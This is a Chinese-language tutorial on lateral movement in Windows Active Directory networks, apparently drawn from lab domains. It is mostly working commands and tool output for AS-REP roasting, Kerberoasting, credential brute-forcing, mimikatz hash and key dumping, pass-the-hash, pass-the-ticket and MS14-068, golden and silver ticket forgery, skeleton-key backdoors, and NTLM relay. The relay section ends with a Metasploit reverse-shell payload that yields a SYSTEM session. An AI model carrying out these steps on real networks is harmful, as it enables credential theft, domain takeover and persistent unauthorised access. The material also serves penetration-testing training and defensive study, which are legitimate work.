内网渗透横行移动

在进行这些东西之前，至少需要一个可完整交互的shell，默认就已经获得了shell，并且提权到nt authority\system

AS-REP Roasting

这是一种针对kerberos协议的攻击技术，不需要认证就可以获取到用户的密码hash值。如果用户开启了“不使用Kerberos预认证”，攻击者就可以获取到Kerberos AS-REP，然后他就可以离线破解这个凭证了。

首先需要知道有哪些用户，这里使用kerbrute来枚举，需要其开启了88端口

需要使用如下的项目：https://github.com/ropnop/kerbrute

kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 20

如果获得如下的输出，则代表枚举到用户名

2020/08/06 17:22:21 >  Using KDC(s):
2020/08/06 17:22:21 >   spookysec.local:88
2020/08/06 17:22:22 >  [+] VALID USERNAME:       james@spookysec.local
2020/08/06 17:22:26 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2020/08/06 17:22:34 >  [+] VALID USERNAME:       James@spookysec.local
2020/08/06 17:22:36 >  [+] VALID USERNAME:       robin@spookysec.local
2020/08/06 17:23:04 >  [+] VALID USERNAME:       darkstar@spookysec.local
2020/08/06 17:23:18 >  [+] VALID USERNAME:       administrator@spookysec.local
2020/08/06 17:23:51 >  [+] VALID USERNAME:       backup@spookysec.local

使用GetNPUsers来获取用户kerberos票证，如果没有开启选项，则会报一个没有设置的错误

GetNPUsers.py spookysec.local/james

λ GetNPUsers.py spookysec.local/james -no-pass
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for james
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set

如果开启的话会显示当前票据

λ GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:a5c2252aa6fd31021c6b73ddf78790a0$4ca233e07269de808a3036ca9f1db6e9a611001682f8dfa433b8409ca87fcd5d604546cfdac46f2cbc86f60455f4779c839ede069e49fd0889edca6017952a5ea26c104ed985aa1c6b82b0f57171c340e743c9f8fe4aef06ace0dd800704024f8808effcd9c602322f4e73e4331914cc22ee2b74d7130ff2bf1f7f89b90d63428d65f655d522fe39adbb24bb0cc815f1e5fab5cefdd5fd4caa775b6712ee3ce99a1f9bb50598a7f77eddd133fdb6c70980154337078128854684bd017df86e0b9ba4769c3db16e7fa4fe702a2622029f6850c82eff7c690096d78f9694978600f5a00beb41cfae1c13b24c6b88cabb6d1f08

再去利用hashcat爆破密码

hashcat -m 18200 hashfile wordlist --force   #hashfile是保存hash的文件名

如果不想先获取用户，可以直接利用GetNPUsers来检索，就是速度有点慢

GetNPUsers.py spookysec.local/  -usersfile userlist.txt -dc-ip 10.10.50.231

获取到的结果会显示如下，可以获取到的用户直接显示，不可以的显示没有设置。

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:59726561a02eb64b0a108c63f1078db3$7866b1dce6fee28d5033ba1f7446e80f03d18649fed3f300aeb55b5fa7f1cdb09d5dcc7259d722e757ddaa305f64ca51b8f05d2740dff233aa3741b944913c2e96bd6767b2cb209f013cfa6b106c6a5a38c48a1fc48e695bfbdf74f21010689e0abd0cfc0a4f2565f08b7a6a4f3645fdee4dd1fedc0b0088cc0fade7e55ec58593c184deecfef267db0ab613f3661a665ce850284c8cfcd033cde5960959331a5fac4cd5f4eb537969614328c5740498fca8cf34d882f4465e78b85302b3b6304042f08e8fb7ecd386b1da5798d6189fe1056f5dc74be490492443b36d2c743090bad3a8970ee8b4b4e6c75eb11ee53fbbf1

Kerberoast

利用的项目：https://github.com/nidem/kerberoast

在Kerberos与TGS通信完成时会返回一张ST，ST使用Server端的密码进行加密。

首先查找注册的SPN。SPN：服务主体名称，服务实例的唯一标识。

setspn -Q */*    #查看当前域内的所有SPN
setspn -T delay.com -Q */*  #查看delay.com域内的SPN

其中格式：<服务类型>/<机器名>:<端口>

CN=DC,OU=Domain Controllers,DC=de1ay,DC=com
	Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC.de1ay.com
    ldap/DC.de1ay.com/ForestDnsZones.de1ay.com
    ldap/DC.de1ay.com/DomainDnsZones.de1ay.com
    TERMSRV/DC 	
    TERMSRV/DC.de1ay.com
    DNS/DC.de1ay.com
    GC/DC.de1ay.com/de1ay.com
    RestrictedKrbHost/DC.de1ay.com
    RestrictedKrbHost/DC
    RPC/3f0c65bc-e5d1-472f-a826-bca6be17b380._msdcs.de1ay.com
    HOST/DC/DE1AY
    HOST/DC.de1ay.com/DE1AY
    HOST/DC
    HOST/DC.de1ay.com
    HOST/DC.de1ay.com/de1ay.com
    E3514235-4B06-11D1-AB04-00C04FC2DCD2/3f0c65bc-e5d1-472f-a826-bca6be17b380/de1ay.com
    ldap/DC/DE1AY
    ldap/3f0c65bc-e5d1-472f-a826-bca6be17b380._msdcs.de1ay.com
    ldap/DC.de1ay.com/DE1AY
    ldap/DC
    ldap/DC.de1ay.com
    ldap/DC.de1ay.com/de1ay.com
CN=krbtgt,CN=Users,DC=de1ay,DC=com
	kadmin/changepw
CN=PC,CN=Computers,DC=de1ay,DC=com
	TERMSRV/PC
    TERMSRV/PC.de1ay.com
    RestrictedKrbHost/PC
    HOST/PC
    RestrictedKrbHost/PC.de1ay.com
    HOST/PC.de1ay.com
CN=WEB,CN=Computers,DC=de1ay,DC=com
    WSMAN/WEB
    WSMAN/WEB.de1ay.com
    TERMSRV/WEB
    TERMSRV/WEB.de1ay.com
    RestrictedKrbHost/WEB
    HOST/WEB
    RestrictedKrbHost/WEB.de1ay.com
    HOST/WEB.de1ay.com
发现存在 SPN! 

但在爆破的时候需要查看加密方式是否为RC4加密，如上的SPN采用的是AES加密。使用klist查看

#3>     客户端: DE1AY @ DE1AY.COM
        服务器: kadmin/changepw @ DE1AY.COM
        Kerberos 票证加密类型: AES-256-CTS-HMAC-SHA1-96
        票证标志 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        开始时间: 8/6/2020 14:52:35 (本地)
        结束时间:   8/6/2020 14:54:35 (本地)
        续订时间: 8/6/2020 14:54:35 (本地)
        会话密钥类型: AES-256-CTS-HMAC-SHA1-96

当然如果是RC4加密，可以使用mimikatz导出票据，离线爆破

kerberos::list /export

导出后，使用脚本字典来爆破票据

./tgsrepcrack.py wordlist.txt xxx-MYDOMAIN.LOCAL.kirbi

如果mimikatz不好使用，还可以使用powershell脚本导出hashcat格式的字符串，离线爆破

需要使用https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1

来导出可以直接爆破的字符串

Import-Module .\Invoke-Kerberoast.ps1

Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation

然后再使用hashcat来执行

hashcat64.exe -m 13100 hash.txt pass.txt

Bruteforcing

暴力破解枚举账号和密码，可以执行的操作有

• 枚举有效的用户名
• 枚举用户名和密码
• 查找没有启动预先身份验证的用户

利用项目：https://github.com/TarlogicSecurity/kerbrute

./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com

要注意账号密码失败次数和账号策略。

PTK

这种形式类似于PTH，只不过在打过补丁KB2871997后，PTH就只限制在Administrator下。但是这种时候还是可以使用aeskey来执行横向移动。

获取账号的aeskey

mimikatz "privilege::debug" "sekurlsa::ekeys"

获取到结果一部分，由于用户是明文保存密码，以下表示的是session0中的一个Windows服务:

         * Username : web$
         * Domain   : DE1AY.COM
         * Key List :
           aes256_hmac       8d7822f543e35904f6e28a0d6f270c3b7902de70296d6693541
57dd33813392e
           aes128_hmac       80a6938c9463a8e5195a5874966ac229
           rc4_hmac_nt       0a147850da3b3c41b055628a202d2b4a
           rc4_hmac_old      0a147850da3b3c41b055628a202d2b4a
           rc4_md4           0a147850da3b3c41b055628a202d2b4a
           rc4_hmac_nt_exp   0a147850da3b3c41b055628a202d2b4a
           rc4_hmac_old_exp  0a147850da3b3c41b055628a202d2b4a

然后再执行注入aeskey

mimikatz "privilege::debug" "sekurlsa::pth /user:web$ /domain:DE1AY.COM /aes256:8d7822f543e35904f6e28a0d6f270c3b7902de70296d669354157dd33813392e"

PTH

哈希传递攻击，就是不需要明文登录，用NTLM hash可直接进行登录。攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务。先查看是否有补丁kb2871997

使用mimikatz先获取hash:

privilege::debug
sekurlsa::logonpasswords

获取到信息部分显示如下

Session           : Interactive from 1
User Name         : de1ay
Domain			  : DE1AY
Logon Server      : DC
Logon Time        : 2020/8/7 16:20:47
SID               : S-1-5-21-2756371121-2868759905-3853650604-1001
	msv :	 	 [00000003] Primary 	 
	* Username : de1ay
    * Domain   : DE1AY
    * LM       : f67ce55ac831223dc187b8085fe1d9df
    * NTLM     : 161cff084477fe596a5db81874498a24
    * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d

获取到hash后执行PTH，再访问远程主机即可直接利用此账号密码访问。

sekurlsa::pth /user:de1ay /domain:DE1AY /ntlm:161cff084477fe596a5db81874498a24

获取到的hash也可以直接进行暴力破解，比如利用hashcat执行

hashcat -m 1000 161cff084477fe596a5db81874498a24 password.dict -o out.txt —force

利用crackmapexec进行批量pass the hash

https://github.com/byt3bl33d3r/CrackMapExec

crackmapexec 192.168.120.0/24 -u de1ay -H 161cff084477fe596a5db81874498a24

PTT

票据传递攻击，使用 Kerberos 票据代替明文密码或 NTLM 哈希的方法。

ms14-068

该漏洞允许用户提升任意普通用户权限成为域管理员（Domain Admin）身份，对应的补丁是kb3011780

需要一个域用户权限和本地机器账号权限。首先是使用域用户权限获取域用户的SID

whoami /all

用户名      SID
=========== ==============================================
de1ay\de1ay S-1-5-21-2756371121-2868759905-3853650604-1001

利用漏洞执行脚本来生成一个票据缓存，https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

C:\bea>MS14-068.exe -u de1ay@de1ay.com -s S-1-5-21-2756371121-2868759905-3853650
604-1001 -d dc.de1ay.com -p 1qaz@WSX
  [+] Building AS-REQ for dc.de1ay.com... Done!
  [+] Sending AS-REQ to dc.de1ay.com... Done!
  [+] Receiving AS-REP from dc.de1ay.com... Done!
  [+] Parsing AS-REP from dc.de1ay.com... Done!
  [+] Building TGS-REQ for dc.de1ay.com... Done!
  [+] Sending TGS-REQ to dc.de1ay.com... Done!
  [+] Receiving TGS-REP from dc.de1ay.com... Done!
  [+] Parsing TGS-REP from dc.de1ay.com... Done!
  [+] Creating ccache file 'TGT_de1ay@de1ay.com.ccache'... Done!

生成一个TGT_de1ay@de1ay.com.ccache票据文件，利用mimikatz注入内存，先清除含有的票据，以免导致写入失败

kerberos::list 
kerberos::purge   //清除
kerberos::ptc TGT_de1ay@de1ay.com.ccache

如果显示Injecting ticket : OK表示成功。

使用kerberos::list 就可以看到注入的票据。

黄金票据

黄金票据就是自己生成的TGT，在生成TGT的过程中，用户、域、权限等信息会经过krbtgt账户hash的加密，所以获取到用户、域、SID、krbtgt的hash值就可以生成黄金票据，生成的票据就是域管账号也就是可以控制整个域。

krbtgt账户一般只在域控服务器上，所以一般需要一个域控器权限。先导出krbtgt用户hash。

privilege::debug
lsadump::lsa /patch       #获取用户hash和域sid

获取hash后，利用mimikatz伪造用户，例如伪造域管理员administrator。

kerberos::golden /domain:de1ay.com /sid:sid /krbtgt:hash /user:administrator /ticket:admin.kirbi

再利用mimikatz导入票据

mimikatz::ptt admin.kirbi

可以使用klist查看票据导入是否成功

白银票据

白银票据伪造利用的是Kerberos认证中的第三个步骤，client会带着ticket向server的某个服务进行请求，如果验证通过就可以访问server上的指定服务了。

还是需要域控制器的权限，在域控制器下执行

privilege::debug
sekurlsa::logonpasswords

获得其中的域sid和NTLM hash。利用mimikatz生成

kerberos::golden /domain:de1ay.com /sid:S-1-5-21-1218902331-2157346161-1782232778  /target:192.168.3.21 /rc4:8432d4fa4430ecf56927dbabd1b4d36b /service:cifs /user:de1ay /ptt

如上生成的cifs服务的票据，可以访问域控制器的文件共享系统。

skeleton key

skeleton key（万能钥匙）就是给所有域内用户添加一个相同的密码，域内所有的用户都可以使用这个密码进行认证，同时原始密码也可以使用，其原理是对lsass.exe 进行注入，所以重启后会失效。

首先在域控中安装skeleton key，所以以下在域控中执行

privilege::debug
misc::skeleton

获得一堆OK，然后直接使用命令去访问，生成的密码是mimikatz。

net use \\dc.de1ay.com mimikatz /user:web\de1ay.com

由于微软增加了lsass的防注入LSA Protection，所以以上适用于系统

Windows 8.1
Windows Server 2012 R2

后来mimikatz也支持了绕过的形式，配合mimidrv.sys

privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::skeleton

此形式并非特权提升，只能算是增加一个新的万能密码。

Relay Hash

目标机器不能开启smb签名，否则利用无效,一般情况下，windows server会默认开启，而windows单机系统默认都不会开。

Inveigh

利用脚本https://github.com/Kevin-Robertson/Inveigh

首先执行，要在特权模式下执行，否则会无法监听

Import-Module .\Inveigh.psd1
Invoke-Inveigh -consoleoutput Y

当其他主机来连接的时候，终端会显示出主机的NTLM hash

[+] [2020-08-11T16:14:30] SMB(445) NTLM challenge 123B1B44BE03722D sent to 10.10.10.201:65312
[+] [2020-08-11T16:14:30] SMB(445) NTLMv2 captured for DE1AY\de1ay from 10.10.10.201(PC):65312:
de1ay::DE1AY::1812B95C562D1DA8C8D033B9F3C259A5:010100000000000096643A70B76FD601D1A5312DF1DFFF35000000310041005900010004004400430004001200640065003100610079002E0063006F006D0003001800440043002E0064006500306F006D0005001200640065003100610079002E0063006F006D000700080096643A70B76FD601060004000200000008003000000000002000007D481BA03B1FB135F248854DE1855E7B7D84F8369E2277395D330602A13038970A001000000000000000000900200063006900660073002F00310030002E00310030002E00310030002E0031003000000000000000000000000000
[+] [2020-08-11T16:14:31] NBNS request for TCONF.F.360.CN<00> received from 10.10.10.201[spoofer dis

如果需要利用hash，可以使用https://github.com/Kevin-Robertson/Invoke-TheHash

Import-Module .\Invoke-TheHash.ps1
Invoke-WMIExec -Target 192.168.30.152 -Domain de1ay.com -Username de1ay -Hash 1812B95C562D1DA8C8D033B9F3C259A5 -Command "whoami" -verbose

smbrelayx

使用impacket中的smbrelayx.py文件来做中继攻击。

python smbrelayx.py -h 192.168.120.140   #IP为想要获取权限的主机地址

如果有主机访问执行中继的地址，比如192.168.120.130

net use \\192.168.120.130\c$ /user:"DE1AY\de1ay" "1qaz@WSX"

如果抓取成功，可以看到如下内容

[*] SMBD: Received connection from 192.168.120.142, attacking target 192.168.120.140
[*] Authenticating against 192.168.120.140 as DE1AY\de1ay SUCCEED
[*] de1ay::DE1AY:b937bb0942684e01:15bf5db54f019b8f52141375eeea221e:0101000000000000738d1ab3bd6fd60180e5339dcce53e660000000002000a00440045003100410059000100060057004500420004001200640065003100610079002e0063006f006d0003001a005700450042002e00640065003100610079002e0063006f006d0005001200640065003100610079002e0063006f006d0007000800738d1ab3bd6fd601060004000200000008003000300000000000000000000000002000007d481ba03b1fb135f248854de1855e7b7d84f8369e2277395d330602a13038970a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320030002e00310033003000000000000000000000000000
[*] Sending status code STATUS_SUCCESS after authentication to 192.168.120.142
[-] TreeConnectAndX not found C$

如果权限足够，可以dump下来192.168.120.140主机上的hash。借助hash来执行命令

python smbrelayx.py -h 192.168.120.140 -c whoami

执行后命令得到执行

[*] Starting service RemoteRegistry
[*] HTTPD: Received connection from 192.168.120.142, attacking target 192.168.120.140
[*] Authenticating against 192.168.120.140 as DE1AY\administrator SUCCEED
[*] administrator::DE1AY:0e7c6d90b614dbe7:a4061e0695772bfca50b692e5c92a1d7:0101000000000000366c24e1be6fd60110d629b8722f71300000000002000a00440045003100410059000100060057004500420004001200640065003100610079002e0063006f006d0003001a005700450042002e00640065003100610079002e0063006f006d0005001200640065003100610079002e0063006f006d0007000800366c24e1be6fd601060004000200000008003000300000000000000000000000002000007d481ba03b1fb135f248854de1855e7b7d84f8369e2277395d330602a13038970a001000000000000000000000000000000000000900280048005400540050002f003100390032002e003100360038002e003100320030002e00310033003000000000000000000000000000
[-] 192.168.120.140 is being attacker at the moment, skipping.. 
[*] Executed specified command on host: 192.168.120.140
nt authority\system

Responder

Responder通过设置几个模拟的恶意守护进程（如SQL服务器，FTP，HTTP和SMB服务器等）来直接提示凭据或模拟质询 – 响应验证过程并捕获客户端发送的必要 hash。

python Responder.py -I eth0 wrp

当有执行访问smb请求时，可以抓取到

[*] [LLMNR]  Poisoned answer sent to 192.168.120.142 for name wpad
[HTTP] NTLMv2 Client   : 192.168.120.142
[HTTP] NTLMv2 Username : DE1AY\de1ay
[HTTP] NTLMv2 Hash     : de1ay::DE1AY:59e4691da47e5fe3:542D7E586900FF2E6C077ED906B08E41:0101000000000000FF2D1573BF6FD6013E50BF5D7E2EDF74000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000007D481BA03B1FB135F248854DE1855E7B7D84F8369E2277395D330602A13038970A001000000000000000000000000000000000000900280048005400540050002F003100390032002E003100360038002E003100320030002E003100330030000000000000000000   

利用可以采用上面提到的脚本https://github.com/Kevin-Robertson/Invoke-TheHash

msfrelay

执行方式大致如下

msf5 > use exploit/windows/smb/smb_relay
msf5 exploit(windows/smb/smb_relay) > show options

Module options (exploit/windows/smb/smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SHARE    ADMIN$           yes       The share to connect to
   SMBHOST                   no        The target SMB server (leave empty for originating system)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  445              yes       The local port to listen on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/smb_relay) > set smbhost 192.168.120.140
smbhost => 192.168.120.140
msf5 exploit(windows/smb/smb_relay) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/smb_relay) > set lhost 192.168.120.130
lhost => 192.168.120.130
msf5 exploit(windows/smb/smb_relay) > set lport 8855
lport => 8855
msf5 exploit(windows/smb/smb_relay) > show options 

Module options (exploit/windows/smb/smb_relay):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SHARE    ADMIN$           yes       The share to connect to
   SMBHOST  192.168.120.140  no        The target SMB server (leave empty for originating system)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  445              yes       The local port to listen on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.120.130  yes       The listen address (an interface may be specified)
   LPORT     8855             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/smb_relay) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.120.130:8855 
[*] Started service listener on 0.0.0.0:445 
[*] Server started.

当有smb的连接过来的时候

C:\Users\de1ay.DE1AY>net use \\192.168.120.130\c$ /user:"DE1AY\administrator" "1
qaz@WSX"

就会有如下反应

msf5 exploit(windows/smb/smb_relay) > [*] Sending NTLMSSP NEGOTIATE to 192.168.120.140
[*] Extracting NTLMSSP CHALLENGE from 192.168.120.140
[*] Forwarding the NTLMSSP CHALLENGE to 192.168.120.142:53508
[*] Extracting the NTLMSSP AUTH resolution from 192.168.120.142:53508, and sending Logon Failure response
[*] Forwarding the NTLMSSP AUTH resolution to 192.168.120.140
[+] SMB auth relay against 192.168.120.140 succeeded
[*] Connecting to the defined share...
[*] Regenerating the payload...
[*] Uploading payload...
[*] Created \QsYUxAsk.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \QsYUxAsk.exe...
[*] Sending stage (180291 bytes) to 192.168.120.140

查看session，可以发现已经有一个建立的session

msf5 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                Connection
  --  ----  ----                     -----------                ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WEB  192.168.120.130:8855 -> 192.168.120.140:54330 (192.168.120.140)